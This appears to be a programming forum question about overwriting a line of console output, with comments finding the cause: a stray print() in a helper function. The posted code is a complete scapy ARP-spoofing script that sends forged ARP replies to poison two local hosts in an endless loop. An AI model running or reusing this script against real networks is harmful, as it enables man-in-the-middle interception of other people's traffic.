# How to properly use Dynamic Printing with Python?

Tags: python

So made this arpspoofing tool with Python, and I just want to print packet numbers sent in a dynamic way, however, the print still goes to a new line each time a packet is sent, I ran it with both python2 and python3 considering (,) and (end="") in either of them but I can't achieve that, here's my code:

```
#!usr/bin/env python
import sys
import time
import scapy.all as scapy

def get_mac(ip):

    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=3, verbose=False)[0]
    print(" ")

    return answered_list[0][1].hwsrc



def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("192.168.100.2", "192.168.100.1")
    spoof("192.168.100.1", "192.168.100.2")
    sent_packets_count += 2
    print("\r[+] Packets sent: " + str(sent_packets_count), end="")
    sys.stdout.flush()
    time.sleep(2)
```

Comment: give example inputs and outputs

Comment: In what environment are you running your code?  There are some (IDLE, for example) that don't support any control characters other than newline, and are therefore incapable of overprinting text.

Comment: You have a print statement in `get_mac`, which is called in your loop. That print statement has no `end=` and so prints a newline.

Comment: @rkechols well that solved it, wow how come I didn't notice that statement!  ... Thank you!